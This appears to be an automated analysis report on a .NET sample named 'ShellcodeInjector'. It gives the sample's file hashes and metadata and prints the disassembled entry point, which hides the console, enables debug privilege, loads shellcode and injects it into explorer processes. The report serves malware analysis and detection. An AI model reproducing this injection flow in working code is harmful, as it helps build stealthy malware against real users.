Symbol Obfuscation Score
|
Hash | Hash Value |
|---|---|
| MD5 | 331fc21ec7998293459910328edd3dfc
|
| Sha1 | 4b1d86a64a987fbdb95dcc7dd5878282e759eab1
|
| Sha256 | d39520f3eebb5fffe353dbed91958b9d61f70123bb9cfdd512da5177cfbbf2ed
|
| Sha384 | 31e78646d3359ef269dcbe07fef132f1fa49bc35744047b2b2696c08bf39f6f360fe639966112ced0c41411c95bd030a
|
| Sha512 | 340bb4788ae3e72e9bb03266ec73dbb1cdca4a0bdace778d8fb4f85a42d37deb470befc6ef98552a15577757982e5fd378c4b084dca8893dd809a3b2d897b381
|
| SSDeep | 1536:C2X99wX8SAnNUfFjD6lYv3mas8rbYD/yim/1y1ejY6yFOBW:/X9KXwNCfiYv3mv8rbg/yjgf6yFOBW
|
| TLSH | F483E192F3B182D4EAF2C031BC116B1BE7F47099591066DF671D69491F33922BA2C3E9
|
PeID
|
Name0 | Value |
|---|---|
| Info | PE Detect: PeReader OK (file layout) |
| Info | PDB Path: C:\Users\LW\source\repos\ConsoleApp1\ConsoleApp1\obj\Debug\ConsoleApp1.pdb |
| Module Name | ConsoleApp1.exe |
| Full Name | ConsoleApp1.exe |
| EntryPoint | System.Void ShellcodeInjector.Program::Main() |
| Scope Name | ConsoleApp1.exe |
| Scope Type | ModuleDef |
| Kind | Console |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | ConsoleApp1 |
| Assembly Version | 1.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | .NETFramework,Version=v4.8 |
| Total Strings | 3 |
| Main Method | System.Void ShellcodeInjector.Program::Main() |
| Main IL Instruction Count | 69 |
| Main IL | nop <null> call System.Void ShellcodeInjector.Program::HideConsole() nop <null> call System.Boolean ShellcodeInjector.Program::EnableDebugPrivilege() pop <null> nop <null> call System.Byte[] ShellcodeInjector.Program::LoadShellcode() stloc.0 <null> ldstr explorer call System.Diagnostics.Process[] System.Diagnostics.Process::GetProcessesByName(System.String) call System.Collections.Generic.List`1<System.Diagnostics.Process> System.Linq.Enumerable::ToList<System.Diagnostics.Process>(System.Collections.Generic.IEnumerable`1<System.Diagnostics.Process>) stloc.1 <null> ldloc.1 <null> callvirt System.Int32 System.Collections.Generic.List`1<System.Diagnostics.Process>::get_Count() ldc.i4.0 <null> ceq <null> stloc.3 <null> ldloc.3 <null> brfalse.s IL_0038: ldc.i4.0 ldc.i4.1 <null> call System.Void System.Environment::Exit(System.Int32) nop <null> ldc.i4.0 <null> stloc.2 <null> nop <null> ldloc.1 <null> callvirt System.Collections.Generic.List`1/Enumerator<System.Diagnostics.Process> System.Collections.Generic.List`1<System.Diagnostics.Process>::GetEnumerator() stloc.s V_4 br.s IL_0062: ldloca.s V_4 ldloca.s V_4 call System.Diagnostics.Process System.Collections.Generic.List`1/Enumerator<System.Diagnostics.Process>::get_Current() stloc.s V_5 nop <null> ldloc.s V_5 ldloc.0 <null> call System.Boolean ShellcodeInjector.Program::TryInject(System.Diagnostics.Process,System.Byte[]) stloc.2 <null> ldloc.2 <null> stloc.s V_6 ldloc.s V_6 brfalse.s IL_0061: nop br.s IL_006B: leave.s IL_007C nop <null> ldloca.s V_4 call System.Boolean System.Collections.Generic.List`1/Enumerator<System.Diagnostics.Process>::MoveNext() brtrue.s IL_0045: ldloca.s V_4 leave.s IL_007C: ldloc.2 ldloca.s V_4 constrained. System.Collections.Generic.List`1/Enumerator<System.Diagnostics.Process> callvirt System.Void System.IDisposable::Dispose() nop <null> endfinally <null> ldloc.2 <null> brtrue.s IL_0082: ldc.i4.0 ldc.i4.1 <null> br.s IL_0083: call System.Void System.Environment::Exit(System.Int32) ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) nop <null> nop <null> leave.s IL_0098: ret pop <null> nop <null> ldc.i4.1 <null> call System.Void System.Environment::Exit(System.Int32) nop <null> nop <null> leave.s IL_0098: ret ret <null> |